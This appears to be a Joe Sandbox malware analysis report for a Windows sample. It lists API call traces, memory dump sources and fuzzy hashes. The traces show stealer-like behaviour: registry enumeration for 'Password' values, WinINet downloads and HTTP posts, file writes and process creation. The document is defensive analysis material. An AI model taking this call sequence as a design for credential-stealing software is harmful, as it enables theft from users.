                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                              • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                              • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                            • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                            • StrCmpCA.SHLWAPI(?,007CC908), ref: 00406147
                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                            • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                            • InternetCloseHandle.WININET(a+A), ref: 00406253
                                            • InternetCloseHandle.WININET(00000000), ref: 00406260
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                            • String ID: a+A$a+A
                                            • API String ID: 4287319946-2847607090
                                            • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                            • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                            • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                            • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                            • memset.MSVCRT ref: 023F0E83
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F0E9C
                                            • lstrcat.KERNEL32(?,00420D7C), ref: 023F0EAE
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F0EC4
                                            • lstrcat.KERNEL32(?,00420D80), ref: 023F0ED6
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F0EEF
                                            • lstrcat.KERNEL32(?,00420D84), ref: 023F0F01
                                            • lstrlen.KERNEL32(?), ref: 023F0F0E
                                            • memset.MSVCRT ref: 023F0F34
                                            • memset.MSVCRT ref: 023F0F48
                                              • Part of subcall function 023FAA87: lstrlen.KERNEL32(023E516C,?,?,023E516C,00420DDE), ref: 023FAA92
                                              • Part of subcall function 023FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 023FAAEC
                                              • Part of subcall function 023F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,023E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 023F8DED
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                              • Part of subcall function 023FAA07: lstrcpy.KERNEL32(?,00000000), ref: 023FAA4D
                                              • Part of subcall function 023F9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,023F0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 023F9948
                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 023F0FC1
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 023F0FCD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                            • String ID:
                                            • API String ID: 1395395982-0
                                            • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                            • Instruction ID: 52ca99f83d97fca1d1fda13364703c2626a4c31afde44cce7df421438861be9e
                                            • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                            • Instruction Fuzzy Hash: E68196B5540218ABCB64EBA0ED51FED733AAF54304F4041A9B30E66091EF746F88CF59
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                            • memset.MSVCRT ref: 023F0E83
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F0E9C
                                            • lstrcat.KERNEL32(?,00420D7C), ref: 023F0EAE
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F0EC4
                                            • lstrcat.KERNEL32(?,00420D80), ref: 023F0ED6
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F0EEF
                                            • lstrcat.KERNEL32(?,00420D84), ref: 023F0F01
                                            • lstrlen.KERNEL32(?), ref: 023F0F0E
                                            • memset.MSVCRT ref: 023F0F34
                                            • memset.MSVCRT ref: 023F0F48
                                              • Part of subcall function 023FAA87: lstrlen.KERNEL32(023E516C,?,?,023E516C,00420DDE), ref: 023FAA92
                                              • Part of subcall function 023FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 023FAAEC
                                              • Part of subcall function 023F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,023E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 023F8DED
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                              • Part of subcall function 023FAA07: lstrcpy.KERNEL32(?,00000000), ref: 023FAA4D
                                              • Part of subcall function 023F9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,023F0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 023F9948
                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 023F0FC1
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 023F0FCD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                            • String ID:
                                            • API String ID: 1395395982-0
                                            • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                            • Instruction ID: 8670abe2b8dec3a46aa6956659f28aeee55b5ce0480a9a0d0ea5d75f59082f88
                                            • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                            • Instruction Fuzzy Hash: 7861D5B5540218ABCB24EBA0ED55FEE773AAF44304F0041A9F70A66091EF746B88CF59
                                            APIs
                                              • Part of subcall function 023FAA07: lstrcpy.KERNEL32(?,00000000), ref: 023FAA4D
                                              • Part of subcall function 023E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023E4A51
                                              • Part of subcall function 023E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023E4A68
                                              • Part of subcall function 023E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023E4A7F
                                              • Part of subcall function 023E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 023E4AA0
                                              • Part of subcall function 023E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 023E4AB0
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 023E4B7C
                                            • StrCmpCA.SHLWAPI(?,0064A480), ref: 023E4BA1
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 023E4D21
                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 023E504F
                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 023E506B
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 023E507F
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 023E50B0
                                            • InternetCloseHandle.WININET(00000000), ref: 023E5114
                                            • InternetCloseHandle.WININET(00000000), ref: 023E512C
                                            • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 023E4D7C
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                            • InternetCloseHandle.WININET(00000000), ref: 023E5136
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                            • String ID:
                                            • API String ID: 2402878923-0
                                            • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                            • Instruction ID: a3057a40a56f056aa3329a03007d04cfcb224a45e6046135d2312de9a7f32a3a
                                            • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                            • Instruction Fuzzy Hash: 1F12B276910218ABCF65EB90ED61FEEB77ABF15300F504199A20AB2191DF742F88CF51
                                            APIs
                                              • Part of subcall function 023FAA07: lstrcpy.KERNEL32(?,00000000), ref: 023FAA4D
                                              • Part of subcall function 023E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023E4A51
                                              • Part of subcall function 023E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023E4A68
                                              • Part of subcall function 023E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023E4A7F
                                              • Part of subcall function 023E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 023E4AA0
                                              • Part of subcall function 023E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 023E4AB0
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                            • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 023E6548
                                            • StrCmpCA.SHLWAPI(?,0064A480), ref: 023E656A
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 023E659C
                                            • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 023E65EC
                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 023E6626
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 023E6638
                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 023E6664
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 023E66D4
                                            • InternetCloseHandle.WININET(00000000), ref: 023E6756
                                            • InternetCloseHandle.WININET(00000000), ref: 023E6760
                                            • InternetCloseHandle.WININET(00000000), ref: 023E676A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                            • String ID:
                                            • API String ID: 3074848878-0
                                            • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                            • Instruction ID: 869cac72e91fa23f09ab461fd399a048f5f8e8bde1a13867dfc7c1a56cc9ac1a
                                            • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                            • Instruction Fuzzy Hash: 0C715E75A40328ABDF24DFA0DC59BEE7779FB44700F108199E60A6B1D0DBB46A88CF41
                                            APIs
                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 023F92D3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateGlobalStream
                                            • String ID:
                                            • API String ID: 2244384528-0
                                            • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                            • Instruction ID: cadf494444f676d46d17f42aeae7a38342d4d54ec7acb36b56b3f0cfe2ff8801
                                            • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                            • Instruction Fuzzy Hash: 3C71ECB9A50208ABDB14DFE4DD84FEEB7BAFF49700F108508F615A7290DB74A905CB61
                                            APIs
                                            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                            • memset.MSVCRT ref: 0041716A
                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                            Strings
                                            • sA, xrefs: 004172AE, 00417179, 0041717C
                                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                            • sA, xrefs: 00417111
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: OpenProcesslstrcpymemset
                                            • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                            • API String ID: 224852652-2614523144
                                            • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                            • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                            • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                            • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                            APIs
                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 023F77A9
                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 023F77E6
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 023F786A
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023F7871
                                            • wsprintfA.USER32 ref: 023F78A7
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                            • String ID: :$C$\$B
                                            • API String ID: 1544550907-183544611
                                            • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                            • Instruction ID: fd63ef3527a10ef29c959fb1d5f175cff15a1af08546585774fc2460a38496e8
                                            • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                            • Instruction Fuzzy Hash: 90416EB1D40358AFDB20DF94DC55BEEBBB9AF48700F000199E609A7280D7756A84CBA5
                                            APIs
                                              • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                              • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                              • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                              • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                              • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                              • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                            • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                            • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                            • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                            • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                            • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                            • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                            • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                            • task.LIBCPMTD ref: 004076FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                            • String ID: :
                                            • API String ID: 3191641157-3653984579
                                            • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                            • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                            • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                            • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                            APIs
                                            • lstrcpy.KERNEL32(?,?), ref: 023F1642
                                              • Part of subcall function 023F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 023F9072
                                              • Part of subcall function 023F94C7: StrStrA.SHLWAPI(?,?), ref: 023F94D3
                                            • lstrcpy.KERNEL32(?,00000000), ref: 023F167E
                                              • Part of subcall function 023F94C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 023F94F7
                                              • Part of subcall function 023F94C7: lstrlen.KERNEL32(?), ref: 023F950E
                                              • Part of subcall function 023F94C7: wsprintfA.USER32 ref: 023F952E
                                            • lstrcpy.KERNEL32(?,00000000), ref: 023F16C6
                                            • lstrcpy.KERNEL32(?,00000000), ref: 023F170E
                                            • lstrcpy.KERNEL32(?,00000000), ref: 023F1755
                                            • lstrcpy.KERNEL32(?,00000000), ref: 023F179D
                                            • lstrcpy.KERNEL32(?,00000000), ref: 023F17E5
                                            • lstrcpy.KERNEL32(?,00000000), ref: 023F182C
                                            • lstrcpy.KERNEL32(?,00000000), ref: 023F1874
                                              • Part of subcall function 023FAA87: lstrlen.KERNEL32(023E516C,?,?,023E516C,00420DDE), ref: 023FAA92
                                              • Part of subcall function 023FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 023FAAEC
                                            • strtok_s.MSVCRT ref: 023F19B7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                            • String ID:
                                            • API String ID: 4276352425-0
                                            • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                            • Instruction ID: 723bbb4e4ededf32b19dd3a5a2ad3511982d2e529bde39ff770849763cbab855
                                            • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                            • Instruction Fuzzy Hash: 77717CB6950219ABCB64EBB0EC98FEE737AAF54300F0445D9E20DA3140EE755B84CF51
                                            APIs
                                              • Part of subcall function 023FAA87: lstrlen.KERNEL32(023E516C,?,?,023E516C,00420DDE), ref: 023FAA92
                                              • Part of subcall function 023FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 023FAAEC
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                            • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 023F58AB
                                            • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 023F5908
                                            • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 023F5ABE
                                              • Part of subcall function 023FAA07: lstrcpy.KERNEL32(?,00000000), ref: 023FAA4D
                                              • Part of subcall function 023F5457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 023F548F
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                              • Part of subcall function 023F5527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 023F557F
                                              • Part of subcall function 023F5527: lstrlen.KERNEL32(00000000), ref: 023F5596
                                              • Part of subcall function 023F5527: StrStrA.SHLWAPI(00000000,00000000), ref: 023F55CB
                                              • Part of subcall function 023F5527: lstrlen.KERNEL32(00000000), ref: 023F55EA
                                              • Part of subcall function 023F5527: strtok.MSVCRT(00000000,?), ref: 023F5605
                                              • Part of subcall function 023F5527: lstrlen.KERNEL32(00000000), ref: 023F5615
                                            • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 023F59F2
                                            • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 023F5BA7
                                            • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 023F5C73
                                            • Sleep.KERNEL32(0000EA60), ref: 023F5C82
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpylstrlen$Sleepstrtok
                                            • String ID: xYy
                                            • API String ID: 3630751533-3875786623
                                            • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                            • Instruction ID: dca3d4790c35a7eb0146e8d8e3f9063192664715bd8799186e1b91d242bcf911
                                            • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                            • Instruction Fuzzy Hash: 82E11F71950208AACF68FBA0FD95DEE737AAF55300F808169E64A66190EF345F4CCF91
                                            APIs
                                            • memset.MSVCRT ref: 00407314
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                            • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                              • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                            • task.LIBCPMTD ref: 00407555
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                            • String ID: Password
                                            • API String ID: 2698061284-3434357891
                                            • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                            • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                            • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                            • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                            APIs
